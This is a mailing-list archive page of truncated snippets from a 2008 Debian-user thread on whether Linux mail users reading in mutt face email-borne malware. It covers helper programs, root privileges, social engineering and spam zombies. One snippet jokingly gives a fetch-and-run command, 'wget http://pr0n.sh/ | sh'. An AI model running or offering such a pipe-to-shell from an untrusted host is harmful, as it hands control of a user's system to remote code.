Am 2008-03-02 17:29:09, schrieb Andrew Sackville-West:
> On Sun, Mar 02, 2008 at 08:16:16PM -0500, Douglas A. Tutty wrote:
> > I never read mail as root, it all gets redirected to me, dtutty. OTOH,
> > dtutty is in lots of groups: ssh, adm, staff so something nasty could do
> based on the above,
Hello Douglas,
Am 2008-03-02 15:59:16, schrieb Douglas A. Tutty:
> Hello all,
>
> I think I don't need to be worried but I figured I should check.
Right, if you use only Linux...
> I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that some
> people run virus scanners on their email
Am 2008-03-02 16:32:26, schrieb David Fox:
> On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
>
> > The potential hole I see in mutt is not actually a hole in mutt but in
> > various helpers used by mutt users. For example, many of us use w3m or
> > links or some other text browser to d
On Sun, Mar 02, 2008 at 03:59:16PM -0500, Douglas A. Tutty wrote:
> I debian or other 'nix suceptible in any way to anything anybody can put
> in an email? I'm guessing that if someone comes up with something that
> can break e.g. mutt that mutt will be fixed around the same time as a
> virus scan
On Tue, Mar 04, 2008 at 03:33:01PM +1300, Chris Bannister wrote:
> On Sun, Mar 02, 2008 at 05:01:06PM -0800, Andrew Sackville-West wrote:
> >
> > sql injections are 'data' trying to be executable, aren't they? I know
> > that generally folks aren't trying to "open" sql "attachements"
> > (whatever
On Sun, Mar 02, 2008 at 05:01:06PM -0800, Andrew Sackville-West wrote:
>
> sql injections are 'data' trying to be executable, aren't they? I know
> that generally folks aren't trying to "open" sql "attachements"
> (whatever the hell that might mean) from mutt...
"SQL injections" are completely di
On Mon, Mar 03, 2008 at 08:56:35AM +0200, Dotan Cohen wrote:
>
> It's called social engineering.
> """want free porn?!? compile this!"""
>
> You'd be surprised how many Windows users install .exes with the hope
> of seeing some free porn.
It is amusing[1] to see attachments that are supposedly .
On Mon, Mar 03, 2008 at 11:59:24PM +0200, Dotan Cohen wrote:
> On 03/03/2008, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> > I think
> > we're in agreement that lack of root access only an impediment, not a
> > preventative.
>
> I'd so like to take that out of context. I won't be lewd in
On 03/03/2008, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> I think
> we're in agreement that lack of root access only an impediment, not a
> preventative.
I'd so like to take that out of context. I won't be lewd in a public
mailing list. Won't be lewd. Must... Control... Self...
Dotan C
On Mon, Mar 03, 2008 at 09:06:43AM +0200, Dotan Cohen wrote:
> On 03/03/2008, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
>
> > sql injections are 'data' trying to be executable, aren't they? I know
> > that generally folks aren't trying to "open" sql "attachements"
> > (whatever the hell
On Mon, Mar 03, 2008 at 06:24:51PM +0200, Dotan Cohen wrote:
> On 03/03/2008, David Fox <[EMAIL PROTECTED]> wrote:
> > True enough. The one time that happened to me I had installed some
> > extra apache packages that were vulnerable, so some spammer basically
> > was able to hijack my box, and send
On Sun, Mar 02, 2008 at 04:32:26PM -0800, David Fox wrote:
> On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> > The potential hole I see in mutt is not actually a hole in mutt but in
> > various helpers used by mutt users. For example, many of us use w3m or
> > links or some other text
On 03/03/2008, David Fox <[EMAIL PROTECTED]> wrote:
> True enough. The one time that happened to me I had installed some
> extra apache packages that were vulnerable, so some spammer basically
> was able to hijack my box, and send stock and other spams out. I was
> able to get it stopped but the cl
On 3/3/08, Tzafrir Cohen <[EMAIL PROTECTED]> wrote:
> By definition, if your user can send mail, your can serve as a spam
> zombie.
True enough. The one time that happened to me I had installed some
extra apache packages that were vulnerable, so some spammer basically
was able to hijack my box, a
On 3/2/08, Dotan Cohen <[EMAIL PROTECTED]> wrote:
> You'd be surprised how many Windows users install .exes with the hope
> of seeing some free porn.
One word: PornBuntu. World domination,. :)
>
> Dotan Cohen
>
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Tr
On Mon, Mar 03, 2008 at 12:08:37PM +0200, Dotan Cohen wrote:
> On 03/03/2008, Tzafrir Cohen <[EMAIL PROTECTED]> wrote:
> > On Mon, Mar 03, 2008 at 08:56:35AM +0200, Dotan Cohen wrote:
> >
> > > It's called social engineering.
> > > """want free porn?!? compile this!"""
> > >
> > > You'd be surp
On 03/03/2008, Tzafrir Cohen <[EMAIL PROTECTED]> wrote:
> On Mon, Mar 03, 2008 at 08:56:35AM +0200, Dotan Cohen wrote:
>
> > It's called social engineering.
> > """want free porn?!? compile this!"""
> >
> > You'd be surprised how many Windows users install .exes with the hope
> > of seeing som
On Sun, Mar 02, 2008 at 04:32:26PM -0800, David Fox wrote:
> For that to work, various helper apps would have to be run as root or
> with root privileges. Normally i would not suspect a pic or other
> 'data' to try and be executable anyway.
By definition, if your user can send mail, your can serv
On Mon, Mar 03, 2008 at 08:56:35AM +0200, Dotan Cohen wrote:
> It's called social engineering.
> """want free porn?!? compile this!"""
>
> You'd be surprised how many Windows users install .exes with the hope
> of seeing some free porn.
Compile?
wget http://pr0n.sh/ | sh
--
Tzafrir Cohen
On Sun, Mar 02, 2008 at 04:11:43PM -0800, Andrew Sackville-West wrote:
> The potential hole I see in mutt is not actually a hole in mutt but in
> various helpers used by mutt users. For example, many of us use w3m or
> links or some other text browser to dump html messages to plain text
> for vie
On 03/03/2008, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> On Sun, Mar 02, 2008 at 04:32:26PM -0800, David Fox wrote:
> > On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> >
> > > The potential hole I see in mutt is not actually a hole in mutt but in
> > > various helpers use
On 03/03/2008, Octavio Alvarez <[EMAIL PROTECTED]> wrote:
> On Sun, 2008-03-02 at 15:59 -0500, Douglas A. Tutty wrote:
> > Hello all,
> >
>
> > I debian or other 'nix suceptible in any way to anything anybody can put
> > in an email? I'm guessing that if someone comes up with something that
>
On 03/03/2008, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> On Sun, Mar 02, 2008 at 03:59:16PM -0500, Douglas A. Tutty wrote:
> > Hello all,
> >
> > I think I don't need to be worried but I figured I should check.
> >
> > I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that
On Sun, Mar 02, 2008 at 08:16:16PM -0500, Douglas A. Tutty wrote:
> On Sun, Mar 02, 2008 at 05:01:06PM -0800, Andrew Sackville-West wrote:
> > On Sun, Mar 02, 2008 at 04:32:26PM -0800, David Fox wrote:
> > > On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
>
> > Anyway, that's the whol
On Sun, Mar 02, 2008 at 05:01:06PM -0800, Andrew Sackville-West wrote:
> On Sun, Mar 02, 2008 at 04:32:26PM -0800, David Fox wrote:
> > On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> Anyway, that's the whole point of an exploit -- providing some
> _thing_, data or code, that causes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On 03/02/08 14:59, Douglas A. Tutty wrote:
> Hello all,
>
> I think I don't need to be worried but I figured I should check.
>
> I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that some
> people run virus scanners on their email (not j
On Sun, Mar 02, 2008 at 04:32:26PM -0800, David Fox wrote:
> On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
>
> > The potential hole I see in mutt is not actually a hole in mutt but in
> > various helpers used by mutt users. For example, many of us use w3m or
> > links or some other t
On 3/2/08, Andrew Sackville-West <[EMAIL PROTECTED]> wrote:
> The potential hole I see in mutt is not actually a hole in mutt but in
> various helpers used by mutt users. For example, many of us use w3m or
> links or some other text browser to dump html messages to plain text
For that to work, va
On Sun, Mar 02, 2008 at 10:08:33PM +, Tzafrir Cohen wrote:
> On Sun, Mar 02, 2008 at 03:59:16PM -0500, Douglas A. Tutty wrote:
> > Hello all,
> >
> > I think I don't need to be worried but I figured I should check.
> >
> > I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that som
On Sun, 2008-03-02 at 15:59 -0500, Douglas A. Tutty wrote:
> Hello all,
>
> I debian or other 'nix suceptible in any way to anything anybody can put
> in an email? I'm guessing that if someone comes up with something that
> can break e.g. mutt that mutt will be fixed around the same time as a
> v
On Sun, Mar 02, 2008 at 03:59:16PM -0500, Douglas A. Tutty wrote:
> Hello all,
>
> I think I don't need to be worried but I figured I should check.
>
> I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that some
> people run virus scanners on their email (not just as anti-spam) and
>
On Sun, Mar 02, 2008 at 03:59:16PM -0500, Douglas A. Tutty wrote:
> Hello all,
>
> I think I don't need to be worried but I figured I should check.
>
> I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that some
> people run virus scanners on their email (not just as anti-spam) and
I
On 3/2/08, Douglas A. Tutty <[EMAIL PROTECTED]> wrote:
> I debian or other 'nix suceptible in any way to anything anybody can put
> in an email? I'm guessing that if someone comes up with something that
save the viruses and other malware from the attachments then forward them to
spammers remove m
On Sun, Mar 2, 2008 at 12:59 PM, Douglas A. Tutty <[EMAIL PROTECTED]> wrote:
> I debian or other 'nix suceptible in any way to anything anybody can put
> in an email? I'm guessing that if someone comes up with something that
> can break e.g. mutt that mutt will be fixed around the same time as
On 02/03/2008, Douglas A. Tutty <[EMAIL PROTECTED]> wrote:
> Hello all,
>
> I think I don't need to be worried but I figured I should check.
>
> I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that some
> people run virus scanners on their email (not just as anti-spam) and
> wonde
Hello all,
I think I don't need to be worried but I figured I should check.
I only run 'nix (debian, OpenBSD), and I'm on dialup. I note that some
people run virus scanners on their email (not just as anti-spam) and
wonder if I need to worry. I don't get enough spam (other than what
comes from
36 matches
Mail list logo
